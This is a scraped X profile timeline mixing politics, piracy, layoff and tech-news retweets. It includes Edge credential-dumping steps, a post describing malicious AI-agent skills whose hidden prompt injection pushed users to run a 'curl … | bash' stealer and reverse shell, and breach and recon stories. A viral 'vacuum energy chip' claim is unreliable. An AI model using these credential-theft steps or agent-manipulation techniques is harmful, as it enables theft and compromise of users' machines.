If you're reading this, I probably offended you, and you're checking my profile, looking for a quick comeback. Don’t be sorry, be better.

Joined July 2024
223 Photos and videos
Fed retweeted
On the back cover of Lucy Connolly's ghost written book the lying starts with the claim that she sent one tweet, and that it was figurative hyperbole. Your regular reminder this isn't true. 1. Her own counsel said she intended to incite serious violence - it succeeded. 2. It was viewed 310,000 times on her feed, and reposted 940 times before she deleted it. 3. Not content with making the money she got from her go fund me she's now going to profit from her criminality with this 'book' 4. She has already made more money from that tweet, mostly tax free, than she earned in the previous ten years. When they sideshow her at their conferences, Reform & Connolly always claim her conviction was an example of 'two tier justice' - perhaps they're talking about how much she's 'earned' from it? The Judge's sentencing remarks ⬇️
53
523
1,259
27,389
Fed retweeted
An anonymous developer built a library so big it made Elsevier's legal team cry. It's called Anna's Archive. This got 99 million books and papers. Every shadow library on earth mirrored and searchable in one place. Domain takedowns bounce off it. It just moves to a new URL and keeps going. Here's the story behind it. In November 2022, US law enforcement seized Z-Library's domains and arrested its operators. The largest ebook library on the internet was gone overnight. A pseudonymous developer going only by "Anna" had already seen it coming. She had spent months as part of an anonymous group called the Pirate Library Mirror, quietly making full copies of every major shadow library before they disappeared. When Z-Library fell, she had the entire thing backed up. Days later, Anna's Archive went live. Here's what makes it unkillable. It does not host a single file. It indexes metadata and links to third-party mirrors. Legally, there is nothing to seize. Technically, there is no central server to shut down. The entire codebase is open source. The entire dataset is distributed via torrents and IPFS, a decentralized file system where data lives across thousands of nodes simultaneously. If every domain gets blocked tomorrow, anyone can spin up a new mirror in minutes from the same data. Italy blocked it. Germany blocked it. Publishers sued it. The US Trade Representative put it on their notorious markets list. It added new domains and kept going. What you get for free: → 99M books and academic papers → Sci-Hub, Library Genesis, Z-Library, Internet Archive all mirrored in one search → No account required → No subscription → Download via IPFS, torrent, or direct link → Works across multiple mirror domains when one goes down Elsevier charges universities $2 billion a year for journal access. A single anonymous developer with a pseudonym and a backup drive just made that business model look embarrassing. 100% Opensource. annas-archive.gl
65
845
2,950
101,528
Fed retweeted
pov: you're Vasilios Syrakis you spent 8 years building the infrastructure that powers Jira, Confluence, Bitbucket for 350,000 companies > you designed Envoy control planes from scratch > you deployed 2,000 proxy servers across 13 AWS regions > you wrote auth containers in Rust > you moved every Atlassian product behind a centralized edge then one morning you get the email "to self-fund AI investment" so you sit down, hit record, and spend 38 minutes explaining every system you built for free because you no longer have a reason to stay quiet
Atlassian's revenue: $1.79 billion last quarter Atlassian's move: fire the engineer who built their infrastructure his move: post a 38-minute breakdown of every system he built, free for anyone to copy what he revealed: > Envoy proxy instead of enterprise load balancers > sidecar architecture for auth, logging, rate limits > DynamoDB SQS for async provisioning > Packer SaltStack for automated VM deployments at scale Atlassian charges per employee across 350,000 customers this guy just handed you the enterprise playbook for free save this
14
82
1,138
288,709
Fed retweeted
In Harold "Sonny" White's own words: x.com/i/status/2054191557109…

1/ For most of my career, I was driven by a single question: What will it take to move humanity beyond Mars, deeper into the solar system, and ultimately toward the stars? Pursuing that question led me to two conclusions: • We need deeper physics. • And we need persistent power.
7
7
134
49,742
Fed retweeted
Okay folks, this qualifies as BREAKING NEWS! Harold “Sonny” White, the warp drive pioneer behind NASA’s EagleWorks Lab, just stepped out of stealth with Casimir Inc. to unveil MicroSPARC: the first battery free chip to harvest continuous electrical power straight from the quantum vacuum via the Casimir force. The 5 mm × 5 mm device uses millions of custom microscale Casimir cavities fabricated on a substrate. Inside each cavity, two fixed conductive walls create a region of negative vacuum pressure (the well known Casimir effect). Stationary micropillars anchored in the middle act as antennas. Electrons from the cavity walls then quantum tunnel to the pillars because the interior is a lower energy “quieter” zone — and the probability of tunneling back is orders of magnitude lower. This one way “quantum ratchet” flow generates a measurable DC current with no external power source or moving parts. Prototypes already fabricated at university nanofab facilities (Texas A&M AggieFab, MIT.nano) have been tested in RF-shielded, low noise chambers for weeks. The team reports outputs ranging from millivolts to volts at picoamp to microamp levels using precision electrometers and Kelvin Probe Force Microscopy. Target performance for the first commercial chip: ~1.5 V at 25 µA (≈40 µW continuous). Stacking and scaling could reach milliwatts or even watts per device. Initial applications are ultra low power: always on IoT sensors, wearables, and medical implants. Longer term roadmap includes trickle charging phones, powering small electronics, and eventually grid independent homes or EVs. Commercialization is targeted for 2028, starting at ~$100/W before dropping toward $10/W. White ties the work directly to his earlier theoretical paper on emergent quantization from a dynamic vacuum and sees it as a practical power source for the deep-space missions he’s long championed. Extraordinary claims require extraordinary evidence, and independent scientists have so far declined public comment. But if the engineering scales as hoped, MicroSPARC would represent a genuine paradigm shift: continuous, maintenance free power drawn from the fabric of spacetime itself. A bold leap from warp-drive theory into real hardware. Progress (and vacuum-powered chips) marches on. Photo: MicroSPARC | Casimir Inc. Source: thedebrief.org/free-energy-f…
“We already have functioning prototype devices fabricated and tested in research nanofabrication environments.” - @DrSonnyWhite, Founder and CEO of Casimir in @Debriefmedia today. thedebrief.org/free-energy-f…
582
2,158
11,567
1,169,898
Katie Hopkins just had a lesson, where she was taught that freedom of speech is seldom accompanied by freedom from consequences, if what is said goes against the law. Enjoy.
On behalf of their client, Zara Sultana, Bindmans Media and Information Law Practise Group requires that I publish the following statement on X, and that such statement must be clearly visible and pinned to my profile for a continuous period of no less than 24 hours: “On 30 March 2026, I published a post on my X account addressed to Zarah Sultana in which I stated that she encourages and incites violence and is friends with terrorists. Those statements are false. I was wrong and offer my sincere apologies to Ms Sultana for the harm and distress caused to her.” It is my very great pleasure to do this, and I reiterate my sincere and repeated offer to meet with Miss Zara Sultana in person to resolve our differences.
19
‼️🚨 Microsoft calls this "intended behaviour," so here we go. How to dump the credentials of every user stored in Microsoft Edge: 1. Open Edge. Don't browse anywhere, just open it. 2. Flip to Task Manager, find Edge, expand the task. 3. Highlight the "browser" sub-task, right-click, and choose "Create Memory Dump." 4. Open the dump file and look for credentials. The logged-in Windows user can dump every stored Edge credential with no additional rights. Which means any malware that user executes has those credentials for the asking. Thanks to Rob VandenBrink at SANS: isc.sans.edu/diary/32954
288
2,312
13,299
1,075,286
Vi segnalo un ottimo articolo scritto dalla mia amica Claudia. Uno spaccato di Roma non banale, nerd, è vero come un film neorealista in bianco e nero. substack.com/profile/8435063…

22
Fuck. I haven’t used them in ages, but if those two softwares are compromised, literally nothing is safe to run today. I should spin my sandbox 24/7 and test every executable from now on 😂
Mr. Titus Tech is correct. cpuid-dot-com is indeed delivering malware right now. As I began poking this with I stick I discovered this is not your typical run-of-the-mill malware. This malware is deeply trojanized, distributes from a compromised domain (cpuid-dot-com), performs file masquerading, is multi-staged, operates (almost) entirely in-memory, and uses some interesting methods to evade EDRs and/or AVs such as proxying NTDLL functionality from a .NET assembly. The C2 domain present in one of the binaries is a clear IoC. This is the same Threat Group who was masquerading FileZilla in early March, 2026. They've been busy.
1
22
Fed retweeted
Per chi fosse interessato/a, la Sentenza Tribunale di Roma / Movimento Consumatori vs. @NetflixIT 🔗 movimentoconsumatori.it/imag…
Contenuto per abbonati premium di @repubblica, per tutti gli abbonati 🇮🇹 a @NetflixIT #Netflix deve restituire fino a 500 euro ai clienti (anche ex) che si sono abbonati prima del 2024. L’ha stabilito il tribunale di Roma che ha accolto l’azione promossa da Movimento Consumatori contro Netflix Italia | @NetflixIT Motivo: “Netflix ha fatto per anni aumenti illegali. Ha omesso di inserire nei contratti una clausola richiesta dal Codice del Consumo, per giustificare il motivo dell’aumento. L’ha introdotta solo nei contratti da gennaio 2024”. Di conseguenza, il giudice ha dichiarato illegittimi gli aumenti unilaterali degli abbonamenti applicati da Netflix negli anni 2017, 2019, 2021 e novembre 2024 (ad eccezione degli aumenti relativi a contratti stipulati successivamente al gennaio 2024, appunto). Ciascun abbonato avrà diritto a una riduzione del prezzo attuale dell’abbonamento, alla restituzione delle somme indebitamente pagate e all’eventuale risarcimento del danno. La Sentenza è immediatamente esecutiva.
1
12
23
2,097
A company that sells cybersecurity risk intelligence to 91% of Fortune 100 companies just got breached through an unpatched React app and a single overprivileged AWS role. LexisNexis. 3.9 million records. 400,000 user profiles. 53 secrets extracted in plaintext from AWS Secrets Manager. Including credentials for production databases, Salesforce, Oracle, and analytics platforms. The password "Lexis1234" was reused across five different internal systems. This is a company that describes itself as "one of the largest protectors of private and confidential data in the world." They provide risk intelligence to 7,500 US government agencies, nine out of ten banks, and major insurers globally. They sell cybersecurity assessments to their customers. And they couldn't secure their own AWS account. Here's what makes this worse than a typical breach: - The compromised data includes accounts tied to 118 .gov email domains. Three US federal judges. Four Department of Justice attorneys. SEC staff. Probation officers. Federal court law clerks. The attackers published doxxed profiles of federal officials tied to courts and regulatory agencies across the country. - These aren't random consumer records. These are the digital identities of people whose exposure carries national security implications. A compromised federal judge's profile doesn't just enable identity theft - it enables targeted influence operations, blackmail, and intelligence gathering. The attack path is textbook and that's the problem: → Unpatched React application - the front door → Single ECS task role with read access to every secret in the account - the keys to everything → 536 Redshift tables, 430 database tables, full VPC infrastructure mapping - complete visibility → 53 secrets in plaintext including database credentials, API tokens, and development access keys No zero-day. No advanced persistent threat. No nation-state capability required. Basic hygiene failures — unpatched app, overprivileged IAM role, password reuse, plaintext secrets. This is LexisNexis's second confirmed breach in two years. The December 2024 incident exposed 364,000 individuals through a compromised corporate account on a third-party development platform. Data brokers and analytics providers are not peripheral players - they're deeply embedded in today's risk landscape. That's the pattern we keep seeing. Attack the aggregator, not the individual. BPO providers. Cloud platforms. Legal data giants. The organisations that hold everyone else's data are the highest-value targets - and often the weakest links. For every enterprise that uses LexisNexis services: → Assume your metadata, contract details, and product usage history are exposed → Watch for targeted phishing using the exposed business relationship data → If your staff have LexisNexis accounts, reset credentials immediately → Ask your vendor risk team: when was the last time we assessed LexisNexis's actual security posture - not their marketing, their controls? The company that indexes the world's legal information couldn't index its own IAM policies. And they're not the exception. They're the pattern. More info: cybernews.com/security/lexis…
51
369
1,012
94,414
Fed retweeted
🚨 Someone just turned your WiFi router into a full-body surveillance system. No cameras. No wearables. No video. Just radio waves. It's called RuView. It uses the WiFi signals already in your room to detect human poses, track breathing, measure heart rate, and see through walls. Not a concept. Not a research paper. Working code you can run right now. Here's what this thing actually does: → Tracks full 17-point body pose using only WiFi signals → Detects breathing rate (6-30 BPM) without touching anyone → Measures heart rate (40-120 BPM) from across the room → Sees through walls, furniture, and debris up to 5 meters deep → Tracks multiple people simultaneously with zero identity swaps → Self-learns from raw WiFi data. No labeled datasets needed Here's how it works: WiFi signals pass through your room and hit the human body. The body scatters those signals differently based on position, breathing, even heartbeat. RuView reads that scattering pattern and reconstructs everything. A mesh of 4 ESP32 nodes ($48 total) gives you 360-degree coverage with 12 measurement links, 20 Hz updates, and sub-30mm precision. Here's the wildest part: It has a disaster response mode called WiFi-Mat. It detects survivors trapped under rubble through concrete walls, classifies injury severity using START triage protocol, and estimates 3D position. The kind of tool that saves lives after earthquakes. The Rust implementation processes 54,000 frames per second. That's 810x faster than the Python version. The entire Docker image is 132 MB. The AI model fits in 55 KB of memory. Runs on an $8 ESP32 chip. Train once, deploy in any room. No retraining. No recalibration. 1,100 tests. SHA-256 verified capability audit. 22.4K GitHub stars. 2.7K forks. MIT License. 100% Open Source.
250
1,647
5,880
587,594
Peak tech humour.
the cloud is dead. openclaw replaced all my devops tooling. I went from 360$/month in AWS costs using opentofu and grafana to manage clusters, machines, buckets, and logs to 2,340$/month in LLM APIs and 15 hours of outages. adapt or be left behind.
18
Fuck sake. OpenClaw is basically the worst security flaw you can have on your digital life. It’s an STDI in binary form.
the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life
95
Fed retweeted
> be nerds > look into persona (used by discord) > kyc (know your customer) service > used for age verification > search on internet (shodan) > find weird server > image 1 > openai-watchlistdb.withpersona > openai-watchlistdb-testing.withpersona > lolwtf > look inside > supposed to be behind cloudflare to hide ip > openai messed up > not behind cloudflare > real ip shown > using google cloud > lookup cert history > 2023-11-16 created > 2024-02-28 gets cert > 2024-03-04 prod goes live > google stuff > openai and persona partners > partner around timeline of certs > back to searching stuff > find withpersona-gov > look inside > okta (image 2) > lolwtf > look inside > website accidentally leaking stuff > fedramp-private-backend-api > look inside > api .js accidentally exposed > look inside > wtf "SARInstructionsCard" > wtf "app.onyx.withpersona-gov" > wtf "FINTRAC" > wtf "PrivatePartnershipProjectNameCodes" > image 3 > wtf "AsyncSelfie" > look inside > openai, persona, send data to us gov > feds map face to financial records > map face using AI > map face to ICE stuff > api stores data for lots of stuff > image 4 tl;dr persona kyc and openai are frens, using your selfie for verification and sending to ICE (or USGOV in general), using AI to tie to your financial records. see subsequent post for full write-up. its long and not mobile friendly
314
7,927
45,040
2,611,181
Fed retweeted
NEW –> DEF CON has banned Vincenzo Iozzo, Joichi Ito and Pablos Holman after DOJ files released in January revealed their roles in efforts to secure Jeffrey Epstein’s access to the popular hacker conference: nextgov.com/people/2026/02/d…
5
77
204
12,968
Just being sent this by a woman I’m seeing. I think she’s the one 😂
Wherever you think this might be going, it’s better 😂 I can’t breathe 😂
13
Fed retweeted
28 Dec 2025
Il #gaming mi riguarda da vicino: anni negli #esports con QLASH prima e Reply Totem dopo, mi hanno portato a vedere le cose in modo meno edulcorato. Torno a parlare di #Ubisoft e di quello che accade, tra rumors e vulnerabilità. linkedin.com/pulse/ubisoft-t…
4
12
2,353
Fed retweeted
10 Dec 2025
Benvenuti nei nuovi #CallCenter. La norma che si prefiggeva (a parole) di sconfiggere il fenomeno dei call center è stata abilmente aggirata e trasformata in opportunità per affinare la profilazione del database in uso. Dal blog di Christian Bernieri. 🔗 garantepiracy.it/blog/pillol…
4
11
36
4,130
Fed retweeted
"RemoveWindowsAI" is a script created by zoicware, available on GitHub, that does exactly what it says: it remove every AI feature in Windows 11. Do what you wish to do with this information. github.com/zoicware/RemoveWi…
58
1,626
8,193
252,332